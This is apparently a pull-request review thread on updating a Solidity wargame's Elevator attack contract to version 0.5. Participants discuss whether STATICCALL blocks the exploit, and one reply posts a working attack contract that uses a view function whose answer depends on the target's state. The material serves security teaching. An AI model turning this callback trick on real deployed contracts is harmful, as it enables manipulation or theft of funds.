contracts/attacks/ElevatorAttack.sol

```diff
@@ -1,4 +1,4 @@
-pragma solidity ^0.4.18;
+pragma solidity ^0.5.0;
```

Comment:
Does this attack still work with 0.5? As I understand the last note [here](https://solidity.readthedocs.io/en/v0.5.8/contracts.html#view-functions), `STATICCALL` should prevent it.

Reply:
Good catch! Have you tested it?

Reply:
No, I just did the 0.4 version and then read the docs...

Reply:
Good point, thank you! I'll definitely test it

Reply:
Whilst the Elevator contract compiles, to get the test to pass, need to change the interface to no longer be view due to `STATICCALL`
```
function isLastFloor(uint) external returns (bool);
```

Reply:
Great, thank you Andrew!

Reply:
This level is solvable on new solidity with a `view` function: ```solidity
contract Hogwarts is Building {
        function isLastFloor(uint floor) view public returns (bool) {
                return floor == Elevator(msg.sender).floor();
        }

        function businessAsUsual(address elevator) public {
                Elevator lift = Elevator(elevator);
                lift.goTo(lift.floor() + 1);
        }
}
```

Reply:
Nice work @NieDzejkob.

I will get updated.